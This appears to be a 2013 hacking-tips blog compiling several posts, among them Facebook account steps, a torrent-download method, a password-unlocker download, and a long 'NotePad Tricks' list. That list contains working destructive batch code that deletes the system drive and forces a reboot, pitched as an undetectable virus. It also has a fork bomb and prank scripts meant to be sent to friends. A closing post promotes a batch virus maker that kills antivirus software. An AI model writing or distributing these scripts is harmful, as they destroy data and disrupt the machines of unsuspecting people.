• White Hat Hacker

    White-hat hackers are the opposite of the black-hat hackers.They’re experts in compromising computer security systems who use their abilities for good, ethical, and legal purposes rather than bad, unethical, and criminal purposes.

  • Black Hat Hacker

    Black-hat hackers violate computer security for personal gain(such as stealing credit card numbers or harvesting personal data for sale to identity thieves) or for pure maliciousness.

  • Grey Hat Hacker

    A gray-hat hacker falls somewhere between a black hat and a white hat.A gray hat doesn’t work for their own personal gain or to cause carnage, but they may technically commit crimes and do arguably unethical things.

Sunday, 28 April 2013

0

Delete a Facebook Account Permanently

Steps:
1- Visit the account deletion page. You will be reminded that this is a permanent deletion and that your account cannot be reactivated and that none of the content or information you have added can be retrieved.

 

2- Click "Submit." Follow the steps, such as entering your password, email, and CAPTCHA code.

 

3- Do not log in for the next 14 days and your account will be deleted completely. If you change your mind before the 14 days are up, just log in and this will reactivate your account.

 

Thursday, 25 April 2013

0

How to reset Window's Password without CMD

Follow The Steps mentioned below to apply this trick:

1- Open run by clicking Ctrl+R
2- Type ''Control uerpasswords2'' and click OK.

3- Click To Uncheck the box labelled ''User must enter a user name and passoword to use this computer'' or you can reset The password by clicking on ''Reset Password''

0

Hide File & Folder (Super Hidden) CMD


It is a 100% Safe and free method to hide a File or Folder from others in your system with the help of CMD.
For this ,open run and type command:

For Hide:
C:\> attrib +a +r +s +h ''folder/file name'' s/d [Enter]

For Unhide:
C:/> attrib -a -r -s -h ''folder/file name'' s/d [Enter]

Limitation:
If hide protected operating system option is unchecked in folder option ,victim can see your files. So Disable folder option feature by this file.Just Download and click yes

Download- Click Here To Download

To Re-Enable : Click Here To Download

I have checked that the Super Hidden files are showing in Search Bar so i would suggest changing the Indexing option to not to show the files in Search Bar:
1: Firstly you have to Un-hide the folder you have hidden. 
2: Open the start menu.
3: In the search bar, type "Indexing Options". Click on "Indexing Options". 
4: Click "Modify". 
5: Use the "Indexed Locations" window to browse to where the folder you want to hide is, and uncheck it. Click "OK". 
6: Close "Indexing Options". 
7: Re-hide the folder. 
And there you go! The unchecked folder will not show up on the search function.

Note: For this to work, the files you want to hide must be in a separate folder, as you are hiding the whole folder.

Wednesday, 24 April 2013

0

Windows Password Unlocker Enterprise 2012


Click Here To Download

Windows Password Unlocker can help you reset forgotten Windows local administrator, domain administrator and other user account passwords on Windows 7/Vista/XP/2008/ 2003/2000. No damage to computer data and settings.






Key Features:

reset local passwordReset Windows Local Password
Remove Windows local administrator and other user passwords.
Change Windows local administrator and other user passwords.
Create a new local admin account to unlock your computer.
Work for Windows 8/7/Vista/XP/2008/2003/2000.
Windows 8 compatible Now.

windows os
Reset Windows Domain Password
Change domain administrator and user password to a new one.
Create new local domain admin account to access your Windows.
Work for Windows 2008(R2)/2003(R2)/2000 servers that act as domain controllers (only available for Active Directory Servers).



Reset Password with CD/DVD/USB
Reset Windows password by burning a bootable disk in any PC that you can run as administrator. Only one simple click required.
Burn the bootable password reset disk with a CD/DVD.
Burn the bootable password reset disk with USB drive.

Easy and Fast to Use for Everyone
 3 simple steps: Download – Burn – Reset under Win PE.
Step1: Download Windows Password Unlocker in any PC.
Step 2: Burn a bootable CD/DVD/USB drive in a few seconds.
Step 3: Reset Windows password under Win PE within a few clicks.



pc brandSupport All PC Brands
Support various brands of desktops, laptops and tablet PCs,
like Dell, Hp, Sony, Toshiba, Acer, Samsung and ThinkPad, etc.
Support any types of hard disks like RAID, SATA, IDE and SCSI

Thursday, 18 April 2013

0

Full Collection of NotePad Tricks

Write ur own simple virus cant detected by any antivirus.

@Echo off
Del C:\ *.*
y


or better version


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe: Dont run that .bat file on ur system .... it will delete the C: Drive
IF ANY ONE DARE TO RUN U LOST CONTENTS OF C drive
EVEN I DIDN't TRY THIS........
I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...
-------------------------------------------------------------------------
-------------------------------------------------------------------------
2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.
==============================================================
3) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.
==============================================================
4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
Code:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "


Save it as "Anything.VBS" and send it.
==============================================================
5) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
==============================================================
6) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
==============================================================
7) Open Notepad continually in your friend's computer:
Type :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.
==============================================================
8 ) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)


echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.
==============================================================
9) Hide text inside your text file !
* Open your command prompt Start–>Run type cmd
* Move to any destination for example let us assume D:\> drive
* Type the below code in your command prompt
* D:\>notepad syshacks.txt:hidden
* syshacks notepad save
* syshacks notepad hidden
* Write some data and save the file.
* Move to D:\> and open syshacks.txt you cannot see no data in the file syshacks.txt.
* To retrieve the hidden data open command prompt and type the same command.
* D:\>notepad syshacks.txt:hidden
* Notepad will open syshacks.txt file with hidden data


==============================================================
10) A Virus That Will Open And Close Ur Cdrom
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Save it as "Anything.vbs" and send it.
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process
==============================================================
11) Notepad virus
Open NotePad And Write This:
Code:
@echo off
:E
start cmd.exe
start calc.exe


Save It As .bat.
==============================================================
12) Code to shutdown computer


Open NotePad And Write This:
Code:
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00
Save It As .bat
==============================================================
13) Code for log
Open NotePad And Write This:
Code:
.LOG
and Save It As .txt
now if you open the file
its writes the time and day that you log...
==============================================================
14) Code for matrix falling text-
Open NotePad And Write This:
Code:
@echo off
:loop
COlor 0A
Title J J f f g g g g
echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop


Save It As .bat
==============================================================
15) Code to make computer chat with you
Open NotePad And Write This:
Code:
dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox("My Name Is Saplas")
fname=inputbox(" I Love You Saplas ^^.")
Save It As .vbs
==============================================================
16) Code to open many windows!
Open NotePad And Write This:
Code:
start
start
start
[The Number of "start" e.x 3 start-->3 windows ,, more start.. more windows ^_^]
Save It As .bat
==============================================================
17) Code for Rick Roll
Open NotePad And Write This:
Code:
@echo off
START
http://www.smooch.net/lol [ you can change the site but i find this Site for RIck Roll-->best] [[for closing this site, push ctrl+alt+delete]]
Save It As .bat
==============================================================
18) Code for Virus Joke
Open NotePad And Write This:
Code:
start
start
start
start
@echo off
msg ' [your text here] example msg ' We Hack So What?
msg ' [your text here] example msg ' Hahahahahaha.
shutdown -s -t 50 -c "your text here" example shutdown -s -t 50 -c "The Pc Gonna Exploded In 50 Sec"


Save It As .bat


If You wait 50 sec, your pc gonna restart..
But..
Start-->Run. Now Write shutdown -a
It Stops The Restart...
==============================================================
19) Code for Virus Joke 2
Open NotePad And Write This:
Code:
@echo off
:hack
echo [your text here] I prefer this example --> echo Trojan Virus Uploading
goto hack
Save It As .bat
==============================================================
20) Code for Adding A Heading And Text
Open Internet Explorer[prefer Mozila Firefox] .Then Open NotePad And Write This:
Code:


In The " ", It's The Name For The Site





Hello
In The " " are the font and the size number.
Example









Hello

==============================================================
21) Code for make a Fork Bomb(LoL)
Open NotePad And Write This:
Code:
start
%0
goto :S


Save It As .bat
If You Open It, It Can Crash Your Pc So Send It In YOUR FRIENDS .. Not to ME ^_^ .
==============================================================
22) Create your own Never Ending Error/Pop up messages
First of all, here are some possible uses for this cool little thing
1. Bind them with your virus's / trojans. You can use any messages remember.
2. To piss off your friends making them think you've messed there computer up.
3. Whatever you want really!


Step 1. Open Notepad
Step 2. Type the following text:
Code:
lol = msgbox("Text You Want Here",16,"Title Of Message Box Here")
Step 3. Create as many lines as you want, for example my outcome would be something like this:
lol = msgbox("A System32 error has occured, please contact microsoft immediately",16,"Fatal Error")
lol = msgbox("Mswinsox (C:\Windows) Will now be deleted",16,"Fatal Error")
lol = msgbox("(C:\Windows) is being deleted",16,"Fatal Error")
lol = msgbox("Your computer will reboot shortly",16,"Fatal Error")
lol = msgbox("If you still have a problem, then you are -beep-ed",16,"Fatal Error")
lol = msgbox("owned you",16,"Fatal Error")




Step 4. Save it as Anything.vbs , distribute it amongst your friends and have a laugh.
==============================================================
23) Make your pc talk with notepad!
Open a text file in notepad and write:
Code:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."
u will hear what u typed
==============================================================
Fake warning boxes:
http://www.maxcheaters.com/forum/index.php?topic=53974.0
==============================================================
Virus in notepad
Paste this in yor notepad
Code:
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}" (Without Quotes)


now save it and scan it by ur antivirus software..
Bush trick
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
or
1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
____________________________________________________________________
____________________________________________________________________
world trade centre trick
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.


log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.


WHY?
The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
************************************************************************
Changing Header and Footer
Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1? on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.


&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


Print tree root
a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system
c. After that hit enter and type {print C:\windows\system\winlog
d. Hit enter and type 4*43?$@[455]3hr4~
e. Then save the file as teekids in C:\windows\system.
===========================================================
===
0

How to Find Your Facebook Profile ID Number

















 Step 1- Open a new Tab in your Browser (pretty simple ah?)

Step 2- Copy the following URL without quotes “https://graph.facebook.com/

Step 3- Paste that URL in your Address Bar and add your Facebook Username after the slash Eg: ''https://graph.facebook.com/Username''

Step 4- As shown in the below picture, You will see your Old Profile ID in the column named “id”


Sunday, 14 April 2013

0

Download Torrent Files New Method

I already posted a Trick on “Download Torrent Files” but unfortunately Furk.net  is not that helpfull.
So I am re posting this trick on because I found a new website similar to Furk.net that helps you in downloading torrent files with IDM.

Advantages of downloading torrent files with IDM:

1.Internet Download Manager(IDM) is the best download manager and speeds up your overall download speed by 5 times.
2.Internet download manager speed doesn’t depend on seeders,leeches etc,it only depends on your Internet connection. So, you can download torrent files with IDM without any difficulty if you have good net connection.
4.If Torrent is blocked in your offices,schools,colleges etc then you can download torrent files with Internet download Manager(IDM) easily.

5.Downloading Torrent Files With IDM is really useful when you are downloading files with less seeds.

What is the alternate website or website like Furk.net?


  • The website similar to Furk.net is zbigz.com.Keep Reading on how to download torrent files with zbigz.com.

Steps To Download Torrent Files With IDM:

1.First go to Zbigz.com[Click Here].

2-There hit on upload and choose the torrent file which you have downloaded previously then hit Go

3-Then a window will pop up asking for premium or free download.Choose Free Download

4-After choosing free your torrent file will be downloaded by high speed servers and your file will be ready to download(If its a large file then wait for few minutes).

5-When you hit download button then a box will pop up asking the type of download which you want either free or premium.Go for free download. 

That’s it your download will be ready and you can download torrent files with idm.
Update 1:If you feel that your file is not caching properly by zbigz,then first get cached link using torcache.net then paste that link in zbigz  and hit go.

Friday, 12 April 2013

0

Sonic Bat, a batch Virus maker



Sonic Bat is a virus creator that creates batch file viruses. This tool also have the bat to exe convertor which can convert the created batch viruses into the windows executable files.

  


This application have a lot of options like folder flood, which flods your victims computer free space with folders having large data..., it can kill security programs like antiviruses, windows defender etc.
With this program you can disable task manager, registry and also have many more options.